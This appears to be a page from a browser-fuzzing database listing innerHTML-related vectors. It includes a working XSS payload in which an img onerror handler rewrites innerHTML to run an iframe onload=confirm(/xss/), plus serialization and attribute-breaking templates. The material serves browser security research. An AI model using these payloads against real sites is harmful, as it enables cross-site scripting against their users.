Featured vector

IE 11.0
<a href="/0x30fcgoogle.com" id="fuzzelement1">asdf</a> <script> if(document.getElementById('fuzzelement1').hostname=="google.com") { alert(1); } </script>

Fuzz vector cloud

5,453,920 Successful fuzzes

Fuzz Vectors

Searching for "innerHTML"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
incorrect innerHTML serialization <*datahtmlelements*>&lt;</*datahtmlelements*> <*datahtmlelements*/>&lt;</*datahtmlelements*> @garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat